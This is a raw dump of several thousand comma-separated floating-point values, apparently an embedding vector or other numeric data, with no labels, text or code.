0.012704628519713879, 0.042386025190353394, 0.018653683364391327, -0.014485352672636509, -0.017296181991696358, 0.0032440321519970894, -0.00770183140411973, 0.0011618626303970814, 0.012600819580256939, 0.01374271884560585, 0.016114355996251106, 0.00299648754298687, 0.027389613911509514, -0.04420667514204979, -0.03491177409887314, 0.014038175344467163, -0.019611921161413193, 0.0011608644854277372, -0.025377314537763596, 0.049796395003795624, 0.002351673785597086, -0.012952173128724098, -0.0020252743270248175, -0.004958877339959145, -0.007047036197036505, -0.0376906618475914, 0.01855785958468914, 0.00799728836864233, 0.03334665298461914, 0.013926380313932896, -0.0034436648711562157, 0.023620547726750374, 0.001282640383578837, -0.013279570266604424, 0.01745588704943657, 0.00975006353110075, -0.004619501996785402, -0.009949696250259876, -0.013694806955754757, -0.002631159732118249, 0.006172644440084696, 0.025712698698043823, 0.01220953930169344, -0.010309034958481789, 0.03277171403169632, -0.022231103852391243, -0.007055021356791258, -0.030935091897845268, -0.030567767098546028, -0.010005593299865723, -0.034145183861255646, -0.009478563442826271, -0.005206421948969364, 0.002379622310400009, 0.011682508513331413, 0.0249940212816, -0.007374433800578117, -0.019595950841903687, -0.04117225855588913, -0.01113950740545988, 0.0442386157810688, 0.004591553471982479, 0.009414680302143097, 0.013119864277541637, -0.023524723947048187, 0.04120419919490814, -0.00592909287661314, -0.03411324322223663, 0.0022478648461401463, 0.0023037618957459927, 0.04347202926874161, -0.015451574698090553, 0.007586044725030661, -0.01795097626745701, 0.024099664762616158, -0.00005904762292630039, -0.0159626342356205, -0.03363412618637085, 0.02949773520231247, -0.035582542419433594, 0.0030743442475795746, -0.028236055746674538, -0.014661028981208801, 0.004112434573471546, 0.0003890343359671533, -0.00564162153750658, -0.003158190054818988, -0.0007226705783978105, -0.015004397369921207, 0.015371722169220448, 0.04190690815448761, -0.022310955449938774, 0.012265436351299286, -0.0033278779592365026, -0.011442949064075947, 0.013654880225658417, 0.007194764446467161, -0.011011742986738682, 0.007039050571620464, -0.007933405227959156, -0.015387692488729954, -0.013207702897489071, 0.01662541553378105, 0.038521137088537216, -0.020634040236473083, -0.03970296308398247, -0.002001318382099271, 0.02036254107952118, -0.018046800047159195, 0.022758133709430695, 0.00829673744738102, -0.0018625735538080335, 0.011323169805109501, 0.007797655183821917, -0.008624134585261345, -0.023333076387643814, -0.015850840136408806, 0.039511315524578094, -0.026111964136362076, -0.012704628519713879, 0.017216328531503677, -0.014756852760910988, -0.03133435547351837, 0.021113159134984016, 0.00812505278736353, -0.04101255163550377, -0.008240840397775173, -0.0249940212816, 0.01790306530892849, 0.0008918592939153314, -0.030567767098546028, 0.012089759111404419, -0.003134234109893441, 0.003908809274435043, 0.025409257039427757, 0.03727542608976364, 0.005322209093719721, -0.030631648376584053, 0.027964556589722633, -0.010963831096887589, -0.03772260621190071, -0.03436877578496933, 0.017471859231591225, 0.02392398938536644, 0.014269748702645302, -0.05171286687254906, 0.013343453407287598, -0.008959517814218998, 0.01643376797437668, 0.04264155402779579, -0.009861857630312443, 0.022007513791322708, 0.023253222927451134, 0.02036254107952118, 0.008895635604858398, -0.025840463116765022, 0.02675078809261322, 0.003611356485635042, -0.0075341397896409035, 0.027517378330230713, -0.03155794367194176, 0.03915996104478836, 0.06292424350976944, -0.012201554141938686, -0.03059970773756504, -0.0150523092597723, -0.02080971747636795, -0.04855068400502205, 0.02293381094932556, -0.022598426789045334, -0.021624218672513962, -0.010348961688578129, -0.014629088342189789, 0.02732573077082634, -0.024562813341617584, -0.0025453176349401474, -0.00615667412057519, -0.024882225319743156, -0.016026517376303673, -0.024562813341617584, -0.006260483060032129, -0.02437116578221321, -0.007270624861121178, 0.00942266546189785, -0.010093431919813156, 0.016529591754078865, 0.04596344381570816, -0.0017727388767525554, -0.021161071956157684, 0.0066118366084992886, 0.006004953291267157, 0.03909607604146004, -0.027517378330230713, 0.022294985130429268, 0.03903219476342201, 0.01157071441411972, -0.011371081694960594, -0.03542283549904823, -0.011730420403182507, 0.0012886293698102236, -0.014684985391795635, 0.022758133709430695, 0.010780168697237968, 0.014245793223381042, -0.020953454077243805, -0.023029634729027748, 0.006432167254388332, 0.019643861800432205, -0.019516097381711006, 0.016481680795550346, -0.0032699843868613243, -0.010868007317185402, -0.0015701116062700748, 0.008536295965313911, 0.028491586446762085, 0.0006617825711145997, 0.010907933115959167, -0.01728021167218685, -0.012712613679468632, -0.006304402370005846, 0.016154281795024872, -0.017919035628437996, 0.0016140307998284698, -0.008172964677214622, -0.016976770013570786, -0.01200192142277956, 0.0028228070586919785, 0.02408369444310665, 0.01879741996526718, 0.003886849619448185, 0.057366468012332916, -0.012896276079118252, -0.024179518222808838, 0.007330514490604401, -0.01625010557472706, -0.02322128228843212, 0.00017480342648923397, 0.006072828080505133, -0.008951532654464245, -0.019643861800432205, -0.027868732810020447, -0.02031462825834751, -0.008903620764613152, -0.007110918406397104, -0.016369884833693504, -0.0018985074711963534, 0.008376589976251125, 0.009901784360408783, 0.003383775008842349, -0.01827039010822773, 0.006296416744589806, -0.022055426612496376, -0.0023277178406715393, 0.0037830406799912453, -0.011195404455065727, -0.0335063599050045, 0.023237252607941628, 0.011482875794172287, 0.00046813880908302963, -0.025760609656572342, -0.0363810732960701, -0.0006832430954091251, 0.03109479695558548, 0.018589802086353302, 0.0416194349527359, 0.009614313021302223, -0.0004319553554523736, -0.029306087642908096, -0.03036014921963215, 0.030216412618756294, 0.01745588704943657, -0.02216722071170807, -0.010173285380005836, -0.0036852206103503704, 0.012241479940712452, 0.0011209378717467189, 0.01999521628022194, -0.0028228070586919785, 0.013407335616648197, -0.00035185273736715317, -0.021145101636648178, -0.016657356172800064, -0.02630361169576645, -0.004751259461045265, -0.00584923941642046, -0.026862582191824913, -0.0027329723816365004, 0.025537021458148956, 0.0023277178406715393, 0.03202109411358833, -0.023237252607941628, -0.0019154762849211693, 0.00610476965084672, 0.04682585969567299, -0.006268468219786882, -0.01753574050962925, -0.025297462940216064, 0.006388247944414616, -0.012425142340362072, -0.00989379920065403, -0.004232214298099279, 0.0075660813599824905, -0.008176957257091999, 0.03670048341155052, -0.00745428679510951, -0.0026451339945197105, 0.0032460284419357777, -0.005270304623991251, 0.007797655183821917, -0.018829360604286194, -0.013327482156455517, 0.016050472855567932, -0.006160666700452566, -0.02183183841407299, 0.01046874187886715, 0.014924544841051102, -0.011235331185162067, -0.06164659187197685, -0.0005599698633886874, -0.02986506000161171, 0.03372994810342789, 0.005481915548443794, -0.03826560452580452, 0.03679630905389786, -0.006384255364537239, 0.02101733535528183, 0.00427214102819562, -0.00989379920065403, -0.02413160726428032, 0.02179989591240883, -0.027645142748951912, -0.0012197560863569379, -0.005701511166989803, 0.01220953930169344, 0.03880860656499863, -0.013367408886551857, -0.019196685403585434, -0.00821688398718834, 0.008360619656741619, -0.028443673625588417, -0.04142778739333153, -0.0012806440936401486, -0.005485908128321171, 0.0057414378970861435, 0.0023197324480861425, -0.022997692227363586, 0.04657032713294029, -0.019196685403585434, -0.0016679316759109497, 0.0015331795439124107, -0.01355905644595623, 0.0015212015714496374, -0.006543961353600025, -0.010500682517886162, -0.01921265572309494, -0.02282201685011387, 0.00995768141001463, -0.04072508215904236, 0.017024680972099304, 0.019516097381711006, 0.01724826917052269, 0.014189896173775196, -0.034272950142621994, -0.008013258688151836, 0.001446339301764965, 0.012688657268881798, 0.004284118767827749, -0.004208258353173733, -0.016218164935708046, -0.023668458685278893, 0.016561532393097878, -0.01900503784418106, 0.002934601390734315, 0.005553782917559147, -0.007298573385924101, -0.027357671409845352, 0.016449738293886185, -0.0020332594867795706, 0.0016729224007576704, 0.01018127053976059, -0.02429131232202053, -0.009622298181056976, -0.015020368620753288, 0.0003296435752417892, -0.03606165945529938, -0.0005519845290109515, 0.024195488542318344, 0.02999282442033291, 0.036924075335264206, 0.02941788174211979, 0.0005774377495981753, -0.03551865741610527, 0.010157314129173756, -0.000547492818441242, 0.01908489130437374, 0.03248424082994461, -0.0392557829618454, 0.03388965502381325, 0.029433852061629295, 0.0028607372660189867, 0.0056496066972613335, -0.005038730800151825, -0.008975488133728504, -0.016337944194674492, -0.04494132474064827, 0.005461952183395624, -0.004887009505182505, -0.03296336159110069, -0.02072986401617527, 0.0009707142598927021, 0.011834229342639446, 0.007985309697687626, 0.004212250933051109, 0.0005105607560835779, -0.019723715260624886, -0.0195001270622015, 0.0032360469922423363, -0.007909449748694897, 0.012568878009915352, -0.015220001339912415, -0.0025113800074905157, 0.003385771531611681, -0.01691288687288761, 0.01573106087744236, -0.012201554141938686, -0.013287555426359177, -0.00939870998263359, 0.0007950374274514616, -0.005118583794683218, -0.022965751588344574, -0.016641385853290558, 0.01581091433763504, 0.022231103852391243, 0.0015381703851744533, -0.020107010379433632, -0.004703347571194172, -0.01591472327709198, -0.010484712198376656, -0.007574066519737244, 0.037626780569553375, 0.0009906775085255504, -0.006615829188376665, -0.03436877578496933, 0.03203706443309784, 0.01380660105496645, 0.0063802627846598625, -0.019819539040327072, 0.026207787916064262, -0.026111964136362076, 0.008727943524718285, -0.018446065485477448, -0.005996967665851116, -0.003609360195696354, -0.02916235290467739, 0.021560337394475937, 0.02216722071170807, 0.03903219476342201, -0.01370279211550951, 0.012177597731351852, 0.014157954603433609, 0.01986745186150074, -0.010045520029962063, -0.018302330747246742, -0.020921511575579643, 0.01916474476456642, 0.012744555249810219, 0.010947859846055508, 0.014956485480070114, -0.011411008425056934, 0.0236844290047884, -0.006024916190654039, 0.028571439906954765, -0.016577502712607384, -0.013032025657594204, -0.005034737754613161, 0.001104967319406569, -0.037626780569553375, -0.015036338940262794, 0.02068195305764675, 0.01331151183694601, -0.020921511575579643, 0.0015221997164189816, 0.016449738293886185, 0.009662224911153316, 0.019803568720817566, -0.04666615277528763, -0.03884054720401764, -0.010556579567492008, -0.031813476234674454, -0.02507387287914753, -0.018366213887929916, -0.03186138719320297, 0.02449893206357956, -0.0193723626434803, -0.02785276062786579, 0.02601614035665989, 0.025137756019830704, 0.004970855545252562, 0.025297462940216064, -0.0047991713508963585, -0.013383379206061363, 0.003870879067108035, 0.012936201877892017, 0.00022333914239425212, -0.0016230142209678888, -0.03176556155085564, -0.0376906618475914, -0.010508667677640915, 0.0010989783331751823, 0.001248702872544527, 0.04954086244106293, 0.0073225293308496475, 0.04244990646839142, -0.005845246836543083, -0.01188214123249054, -0.016737209632992744, -0.005282282363623381, -0.027517378330230713, 0.016705268993973732, 0.021161071956157684, 0.018094712868332863, -0.005378106143325567, -0.012145656161010265, 0.01766350492835045, 0.012808437459170818, 0.004248185083270073, -0.007769706659018993, 0.007350477855652571, 0.014645058661699295, 0.014437440782785416, -0.049796395003795624, 0.039223842322826385, 0.00975006353110075, 0.0043320306576788425, 0.008224869146943092, 0.0067555722780525684, -0.006551946979016066, -0.0594107061624527, -0.02769305557012558, 0.0015132162952795625, -0.001310589024797082, -0.024978049099445343, 0.00576539384201169, 0.013782644644379616, 0.017376035451889038, -0.012960158288478851, 0.028076350688934326, -0.021815866231918335, -0.02167213149368763, 0.020873600617051125, 0.00036557746352627873, -0.000852930941618979, 0.004244192503392696, -0.049508921802043915, -0.004579575266689062, -0.010604491457343102, 0.02879502810537815, 0.005362135823816061, -0.014948500320315361, -0.01720035821199417, 0.008109082467854023, 0.01413399912416935, 0.028172174468636513, -0.0034895804710686207, -0.004587560426443815, 0.023444870486855507, 0.005689533427357674, 0.012704628519713879, -0.005302245728671551, 0.012257451191544533, 0.004260162822902203, 0.008520325645804405, -0.003814981784671545, -0.0002715005539357662, -0.02195960283279419, -0.025041932240128517, 0.008208898827433586, 0.021208982914686203, 0.003393756691366434, -0.040980610996484756, -0.012057818472385406, 0.0008379584760405123, -0.008240840397775173, 0.03650883585214615, 0.028970705345273018, -0.012369245290756226, -0.017152445390820503, 0.01113950740545988, 0.0014962474815547466, 0.0520961619913578, -0.024147577583789825, -0.013878468424081802, -0.012656716629862785, 0.00807314831763506, -0.00950251892209053, -0.00016731719370000064, -0.008879664354026318, -0.014708940871059895, -0.03051985427737236, 0.01614629663527012, 0.008831752464175224, -0.018174566328525543, 0.0010580535745248199, -0.024610726162791252, 0.011658553034067154, -0.0014653044054284692, 0.02175198495388031, 0.00601293845102191, 0.023700399324297905, 0.0058332690969109535, -0.018701596185564995, 0.005338179878890514, -0.0026910495944321156, 0.006691689603030682, -0.014629088342189789, 0.007055021356791258, -0.010197240859270096, -0.008041206747293472, -0.023412929847836494, -0.009614313021302223, 0.03178153559565544, -0.04644256457686424, 0.024482959881424904, -0.023157399147748947, -0.012512980960309505, 0.0043919202871620655, -0.00958237238228321, -0.02052224613726139, -0.00777369923889637, -0.0016309996135532856, -0.02261439710855484, -0.006496049929410219, 0.000095449409855064, 0.00768186803907156, 0.05330992862582207, 0.04165137559175491, -0.01978759840130806, -0.024898197501897812, -0.01900503784418106, -0.01675317995250225, 0.0008140025311149657, 0.01202587690204382, 0.0045755826868116856, 0.01206580363214016, 0.012768510729074478, -0.0020242761820554733, -0.0260480809956789, -0.022422751411795616, -0.02884293906390667, -0.00942266546189785, 0.020330598577857018, -0.014389528892934322, -0.004990818910300732, 0.02101733535528183, -0.004439832177013159, 0.01753574050962925, 0.02363651804625988, -0.03829754516482353, -0.010804124176502228, -0.017360063269734383, 0.0003708178410306573, 0.011179434135556221, -0.022438721731305122, -0.008600179105997086, 0.013447262346744537, -0.008248825557529926, -0.0013764678733423352, -0.0007161825196817517, 0.03424100950360298, -0.003906812984496355, -0.013223673216998577, 0.0030024766456335783, -0.004691369831562042, -0.01929250918328762, 0.014173924922943115, -0.0008234850829467177, 0.006224549375474453, -0.016090400516986847, -0.003719158237800002, -0.032212741672992706, 0.02306157536804676, 0.011938038282096386, 0.00964625459164381, 0.009766033850610256, -0.01708856411278248, -0.02159227803349495, 0.0060648429207503796, 0.04832709580659866, -0.0036652572453022003, 0.0075341397896409035, 0.00021735015616286546, 0.0055897170677781105, 0.008057177998125553, -0.004958877339959145, 0.022518575191497803, 0.0034696171060204506, -0.007146852556616068, -0.00210013659670949, 0.020426422357559204, -0.005957041401416063, -0.015539413318037987, 0.006152681540697813, 0.017056621611118317, 0.005174480844289064, 0.008069155737757683, -0.0031981165520846844, -0.008304722607135773, 0.008376589976251125, 0.005062686745077372, 0.03960713744163513, -0.0027768914587795734, 0.0038828570395708084, -0.039064135402441025, -0.0010036536259576678, 0.020825687795877457, 0.03138227015733719, 0.0011259287130087614, 0.0014163943706080317, -0.017136475071310997, 0.006328358314931393, 0.006903300527483225, -0.021656161174178123, 0.004623494576662779, -0.01632995903491974, -0.004244192503392696, -0.0006632797885686159, 0.030328206717967987, 0.0075541031546890736, -0.008608164265751839, 0.0040685152634978294, 0.010604491457343102, -0.010636433027684689, -0.014293705113232136, -0.010396873578429222, 0.003527510678395629, 0.004112434573471546, 0.012904261238873005, 0.00027349687297828496, -0.03526312857866287, 0.017647534608840942, -0.0029206271283328533, 0.010788153856992722, 0.012017891742289066, -0.022502603009343147, -0.027293790131807327, -0.0025473139248788357, -0.01349517423659563, -0.014086087234318256, 0.0021560336463153362, -0.026159875094890594, 0.010995771735906601, 0.025249550119042397, -0.0023017656058073044, -0.04078896343708038, -0.01157071441411972, -0.014605131931602955, 0.019228626042604446, -0.022550515830516815, -0.016577502712607384, 0.012097744271159172, -0.012465069070458412, -0.0316697396337986, 0.0301046185195446, 0.026926465332508087, 0.0059211072511971, 0.010412843897938728, -0.00556975370272994, -0.014964470639824867, 0.02568075619637966, -0.02269425056874752, -0.008248825557529926, 0.0068673668429255486, 0.018302330747246742, 0.009734093211591244, -0.021145101636648178, 0.017631564289331436, 0.012265436351299286, 0.026447346433997154, 0.011993935331702232, 0.0052663120441138744, -0.0035874005407094955, 0.001301605487242341, 0.006795499008148909, 0.009534460492432117, -0.008472413755953312, -0.012896276079118252, 0.004563604481518269, 0.019516097381711006, -0.003070351667702198, -0.011946023441851139, 0.04145972803235054, -0.003978680819272995, -0.023365017026662827, 0.01954803802073002, 0.0008664061315357685, 0.019883422181010246, 0.014229822903871536, 0.009494533762335777, 0.014740882441401482, 0.01501238252967596, 0.0015052309026941657, -0.04235408455133438, -0.028172174468636513, -0.030248355120420456, 0.0024115636479109526, 0.02630361169576645, -0.021320777013897896, -0.014014218933880329, 0.0004953387542627752, 0.002740957774221897, -0.0345604233443737, -0.00950251892209053, -0.007406374905258417, -0.00615667412057519, 0.01130719855427742, 0.021161071956157684, -0.022837987169623375, -0.007102933246642351, 0.04727303609251976, -0.02675078809261322, 0.019356392323970795, -0.008823767304420471, -0.017471859231591225, 0.0029226234182715416, 0.013998248614370823, 0.028890851885080338, -0.02052224613726139, -0.04417473450303078, -0.01540366280823946, -0.014205866493284702, 0.002507387427613139, 0.00025652808835729957, -0.0059849899262189865, -0.014062130823731422, 0.008520325645804405, -0.004910965450108051, -0.0080491928383708, -0.006332350894808769, 0.012217524461448193, -0.039223842322826385, 0.013135834597051144, 0.013942351564764977, -0.002543321345001459, -0.008408531546592712, -0.01388645451515913, 0.008117067627608776, 0.015267913229763508, 0.023205310106277466, 0.014940515160560608, 0.017216328531503677, 0.01022119726985693, -0.04117225855588913, -0.008903620764613152, -0.0023935965728014708, -0.01876547932624817, -0.01803082972764969, -0.012592833489179611, -0.022806044667959213, -0.018302330747246742, -0.01646570861339569, 0.03999043256044388, -0.004655435681343079, -0.014349602162837982, -0.013191732577979565, -0.005873195361346006, 0.015275898389518261, 0.029433852061629295, -0.0009981637122109532, -0.019755657762289047, 0.004902980290353298, -0.00603290181607008, -0.028747115284204483, 0.003297933144494891, -0.032675888389348984, 0.010269108228385448, -0.004308074712753296, 0.003134234109893441, 0.006879344582557678, -0.020873600617051125, -0.0003391261270735413, 0.022007513791322708, 0.013423305936157703, -0.0025632844772189856, 0.002451490145176649, -0.02528149075806141, 0.014748867601156235, 0.006332350894808769, -0.0052862754091620445, 0.003771062707528472, 0.01617823727428913, 0.010700315237045288, -0.008464428596198559, 0.013503159396350384, -0.020346570760011673, 0.01847800798714161, -0.01782321184873581, -0.030567767098546028, 0.014030189253389835, -0.020458364859223366, 0.036924075335264206, 0.00586920278146863, 0.005933085456490517, -0.0064720939844846725, 0.015347765758633614, -0.010604491457343102, 0.008264795877039433, -0.000273746409220621, -0.016481680795550346, -0.026431376114487648, 0.018078742548823357, -0.0034576391335576773, -0.008288751356303692, -0.018302330747246742, 0.004064522683620453, -0.006028909236192703, 0.04858262464404106, -0.02104927785694599, 0.004954884760081768, -0.03449653834104538, -0.011482875794172287, -0.015291868709027767, -0.006823447532951832, -0.000682744022924453, -0.017583653330802917, -0.0015820895787328482, 0.0027609209064394236, 0.0027170018292963505, -0.013391365297138691, 0.007047036197036505, -0.007633956614881754, -0.03625330701470375, 0.037626780569553375, -0.016721239313483238, -0.012640745379030704, 0.012592833489179611, 0.015579340048134327, 0.015898752957582474, 0.03222871199250221, 0.0009018409764394164, 0.00799728836864233, -0.009015414863824844, -0.022518575191497803, 0.0021300814114511013, -0.003735128790140152, 0.029018616303801537, -0.03028029575943947, -0.01803082972764969, -0.015100221149623394, 0.017887094989418983, 0.007562088780105114, -0.008688017725944519, 0.006392240524291992, 0.008085126057267189, -0.008488385006785393, 0.012329318560659885, 0.030328206717967987, -0.01363890990614891, -0.0403098464012146, -0.008935562334954739, 0.017998889088630676, 0.008791826665401459, 0.008320692926645279, -0.03203706443309784, 0.00939870998263359, 0.027437524870038033, 0.017216328531503677, -0.016090400516986847, 0.0269584059715271, -0.0007411366095766425, 0.011027713306248188, 0.006416196469217539, 0.004942907020449638, -0.010388888418674469, -0.024355195462703705, -0.02962549962103367, 0.009382739663124084, -0.02172004245221615, -0.011259287595748901, 0.0019224634161219, -0.0022418757434934378, 0.028459645807743073, 0.03583807125687599, -0.00785355269908905, -0.008053185418248177, -0.008839738555252552, 0.008017251268029213, -0.014365572482347488, 0.02360457554459572, 0.006152681540697813, 0.02175198495388031, -0.004383935127407312, -0.025265520438551903, 0.022949781268835068, -0.029242204502224922, -0.026207787916064262, -0.00039352604653686285, -0.015667177736759186, 0.013527114875614643, -0.004723310936242342, 0.008408531546592712, -0.025952257215976715, -0.01732812263071537, 0.01355905644595623, -0.0012377230450510979, -0.016090400516986847, 0.012073788791894913, -0.01327158510684967, 0.004994811490178108, -0.018014859408140182, 0.007749743293970823, 0.012361260131001472, -0.0014673006953671575, -0.01548351626843214, 0.025249550119042397, 0.012648731470108032, -0.006356306839734316, 0.017966948449611664, -0.021272866055369377, -0.02285395748913288, -0.01929250918328762, -0.0077537358738482, 0.0012457083212211728, -0.011578699573874474, 0.010740241967141628, 0.03567836433649063, -0.007510184310376644, -0.0004219737311359495, 0.01366286538541317, 0.031206591054797173, -0.013926380313932896, 0.020697923377156258, 0.016992740333080292, -0.02539328671991825, 0.004715325776487589, 0.03510342165827751, 0.012177597731351852, -0.01876547932624817, 0.013119864277541637, 0.012560892850160599, -0.0059211072511971, -0.014613117091357708, 0.006947219837456942, 0.01790306530892849, -0.001948415650986135, 0.015723075717687607, -0.012369245290756226, 0.039383549243211746, -0.00567356264218688, 0.006667733658105135, -0.0033877678215503693, -0.006304402370005846, 0.0038928387220948935, 0.006304402370005846, 0.011379066854715347, 0.0013764678733423352, 0.018174566328525543, -0.0024894203525036573, -0.01868562586605549, 0.0033418522216379642, -0.0011868167202919722, 0.007362456060945988, -0.020043127238750458, -0.008807796984910965, 0.016609445214271545, 0.005138547159731388, 0.027581261470913887, 0.021129129454493523, -0.005298253148794174, -0.03753095865249634, -0.03280365467071533, 0.004691369831562042, -0.005326201673597097, -0.0018256414914503694, -0.014405499212443829, 0.009326841682195663, -0.013407335616648197, 0.00556975370272994, -0.004026592709124088, 0.003663260955363512, 0.0004783699696417898, -0.012736569158732891, 0.012041847221553326, -0.012185582891106606, 0.005729460157454014, 0.02646331675350666, -0.008472413755953312, -0.0028148218989372253, -0.009758048690855503, -0.0035514666233211756, -0.02408369444310665, 0.02322128228843212, 0.0017727388767525554, 0.00004176691436441615, -0.012185582891106606, 0.0063802627846598625, -0.027804849669337273, 0.028299938887357712, -0.0017577663529664278, 0.0030384105630218983, 0.018957126885652542, -0.01782321184873581, -0.03318694978952408, -0.004407891072332859, -0.023748312145471573, 0.025696728378534317, -0.019148772582411766, 0.013854512944817543, 0.0006108761881478131, -0.0018745515262708068, 0.0023297141306102276, -0.017471859231591225, -0.018813390284776688, 0.002730976091697812, 0.0011928057065233588, -0.0020142944995313883, 0.02777290903031826, 0.0018485992914065719, 0.010628447867929935, -0.004747266881167889, 0.030216412618756294, 0.013838542625308037, 0.014269748702645302, -0.0011299214093014598, 0.012137671001255512, -0.001795696560293436, 0.0004446819657459855, -0.025632845237851143, 0.010684344917535782, 0.004423861857503653, -0.008552267216145992, -0.008799811825156212, 0.017583653330802917, 0.02002715691924095, -0.004807156510651112, 0.0002612693642731756, 0.0013804604532197118, -0.0010440793121233582, -0.009510504081845284, 0.007606007624417543, 0.0027090164367109537, -0.012952173128724098, 0.014716926030814648, 0.011131522245705128, -0.006667733658105135, 0.01142697874456644, -0.001660944428294897, -0.012928216718137264, 0.026686906814575195, 0.006256490480154753, 0.002333706943318248, -0.010732256807386875, 0.005825283471494913, -0.02187974937260151, -0.013902424834668636, -0.008001280948519707, 0.0029206271283328533, 0.011434963904321194, -0.010380903258919716, -0.006252497900277376, 0.004471773747354746, -0.019675804302096367, 0.01409407239407301, -0.01355905644595623, 0.013838542625308037, -0.002309750998392701, -0.0022119309287518263, -0.0014972456265240908, -0.01387048326432705, 0.027293790131807327, 0.011434963904321194, 0.014253778383135796, -0.016234135255217552, 0.0010630444157868624, -0.004643457941710949, 0.009574386291205883, -0.0013854512944817543, 0.020330598577857018, 0.014261763542890549, -0.008767870254814625, -0.016561532393097878, 0.012688657268881798, -0.014397514052689075, -0.016194209456443787, 0.003060369985178113, -0.015140147879719734, 0.00401661079376936, 0.006871359422802925, -0.00950251892209053, 0.002774895168840885, 0.0037031874526292086, -0.004970855545252562, 0.015986591577529907, -0.014517293311655521, -0.001444342895410955, -0.0113870520144701, -0.012009906582534313, 0.026159875094890594, 0.03044000267982483, 0.014229822903871536, 0.0018835349474102259, -0.0006123734638094902, 0.01662541553378105, -0.01220953930169344, -0.01843009516596794, 0.008480398915708065, -0.014525278471410275, -0.0337618924677372, 0.011914082802832127, -0.0015241960063576698, 0.009159150533378124, -0.01130719855427742, -0.0038908421993255615, 0.014461396262049675, -0.003250021254643798, 0.004671406466513872, -0.00027175009017810225, -0.011219360865652561, 0.0006632797885686159, 0.010436800308525562, -0.00560169480741024, 0.011434963904321194, -0.02494610846042633, -0.025489110499620438, -0.007194764446467161, -0.004683384206146002, -0.00939870998263359, -0.0054260180331766605, -0.023908019065856934, -0.02057015895843506, -0.005553782917559147, -0.02195960283279419, -0.011339140124619007, -0.005154517479240894, 0.011011742986738682, 0.00581729831174016, 0.041970789432525635, -0.00792941264808178, 0.0034576391335576773, -0.012305363081395626, 0.0032999294344335794, 0.016737209632992744, 0.0195001270622015, -0.01761559396982193, -0.019388332962989807, 0.021432572975754738, -0.023333076387643814, 0.012153642252087593, 0.010708300396800041, 0.003018447197973728, 0.01814262382686138, 0.00782560370862484, 0.0008694006246514618, -0.0009547436493448913, -0.02314142882823944, 0.002189971273764968, 0.004763237200677395, -0.007562088780105114, 0.006444144994020462, -0.0026870567817240953, 0.005402062088251114, 0.004475766327232122, 0.005278289783746004, 0.017583653330802917, -0.018286360427737236, 0.021863779053092003, 0.01519604492932558, 0.018286360427737236, -0.004320052918046713, 0.00952647440135479, 0.017791271209716797, -0.01934042014181614, -0.0007596026407554746, 0.0059849899262189865, -0.024019813165068626, -0.016785122454166412, -0.024562813341617584, 0.022502603009343147, 0.0035334997810423374, -0.01712050475180149, -0.0014792786678299308, -0.0029785207007080317, -0.0038948350120335817, 0.01957998052239418, 0.017919035628437996, 0.01558732520788908, 0.014285719953477383, 0.019691774621605873, 0.015747031196951866, -0.025616874918341637, -0.03289947658777237, -0.020554188638925552, -0.020298657938838005, 0.0032959366217255592, 0.014645058661699295, 0.0074143605306744576, 0.006911285687237978, -0.002273817081004381, 0.007542125415056944, 0.0064521306194365025, 0.008488385006785393, -0.0010860022157430649, 0.000969716114923358, 0.018653683364391327, 0.030248355120420456, -0.00903138518333435, 0.021783925592899323, 0.03701989725232124, 0.007126889191567898, 0.00854428205639124, -0.0065200054086744785, 0.0034316868986934423, 0.0026970384642481804, 0.0005400066147558391, 0.002205941826105118, 0.0040685152634978294, 0.005729460157454014, 0.00829673744738102, -0.0022318940609693527, -0.021001365035772324, 0.0012966147623956203, 0.003180149709805846, -0.008991459384560585, 0.0063004097901284695, 0.00034736099769361317, 0.030615678057074547, -0.029801176860928535, 0.01593867875635624, -0.000030022894861758687, -0.0014203870669007301, -0.0221193078905344, -0.0018296341877430677, 0.02667093463242054, -0.01200192142277956, -0.00018378690583631396, -0.004511700011789799, -0.004655435681343079, 0.0001669428893364966, 0.011682508513331413, -0.007857545278966427, 0.017966948449611664, -0.005390084348618984, 0.0229018684476614, 0.017887094989418983, 0.01724826917052269, 0.008807796984910965, -0.006791505962610245, 0.01581091433763504, 0.007458279374986887, 0.01142697874456644, 0.008408531546592712, -0.0014024201082065701, -0.005418032873421907, 0.0025732661597430706, 0.011514817364513874, -0.0078096333891153336, 0.013487189076840878, 0.006404218729585409, -0.00787750817835331, -0.00952647440135479, -0.004659428261220455, 0.013047996908426285, -0.009007429704070091, -0.0059211072511971, 0.01708856411278248, 0.01335143856704235, -0.00821688398718834, 0.026607053354382515, 0.011954009532928467, -0.000026716475986177102, 0.012417157180607319, -0.006687697023153305, -0.003216083627194166, -0.001247704727575183, 0.003763077314943075, 0.02191169001162052, -0.01146690547466278, -0.0018875276437029243, 0.01155474316328764, -0.011993935331702232, -0.014940515160560608, -0.014597146771848202, 0.009758048690855503, -0.037307366728782654, 0.02523357979953289, -0.012201554141938686, 0.012177597731351852, -0.00027125098858959973, 0.0013694806257262826, -0.0007191770127974451, 0.004982833284884691, -0.003100296715274453, -0.012792466208338737, 0.02564881555736065, -0.01675317995250225, 0.01942027360200882, 0.011946023441851139, -0.007166815921664238, -0.0051225763745605946, 0.020474335178732872, 0.015395677648484707, 0.004320052918046713, -0.030487913638353348, -0.009111238643527031, 0.0009527473011985421, 0.00011840717343147844, -0.001911483588628471, 0.015459559857845306, -0.003283958649262786, 0.0008938556420616806, -0.007470257580280304, 0.0032919440418481827, -0.01978759840130806, 0.0023935965728014708, 0.018366213887929916, 0.010804124176502228, -0.008336663246154785, 0.01388645451515913, 0.02020283415913582, -0.0021939638536423445, -0.0005594707909040153, 0.012656716629862785, 0.011339140124619007, 0.008344649337232113, -0.0043120672926306725, 0.008975488133728504, 0.005677555222064257, -0.001059051719494164, -0.010492697358131409, 0.009534460492432117, -0.01978759840130806, 0.00018154103599954396, 0.01769544743001461, 0.004164339043200016, 0.001023117802105844, 0.010388888418674469, -0.008855708874762058, 0.010612476617097855, 0.0022298977710306644, 0.014804764650762081, 0.004942907020449638, -0.017679477110505104, 0.0020622063893824816, 0.015395677648484707, 0.013279570266604424, -0.006308394949883223, 0.02023477479815483, -0.020250746980309486, 0.01999521628022194, 0.035167306661605835, 0.0059849899262189865, -0.006639785133302212, 0.0016290032071992755, 0.018541889265179634, 0.010875992476940155, -0.005988982506096363, -0.016234135255217552, 0.02986506000161171, -0.00757805909961462, 0.027756936848163605, 0.008029229007661343, 0.027581261470913887, -0.024642666801810265, 0.010261123068630695, -0.01748782955110073, -0.019883422181010246, 0.015491501428186893, 0.015435604378581047, -0.0018695606850087643, 0.001912481733597815, 0.012017891742289066, -0.015555383637547493, 0.0021161071490496397, -0.002623174339532852, 0.011514817364513874, 0.01308792270720005, -0.008464428596198559, 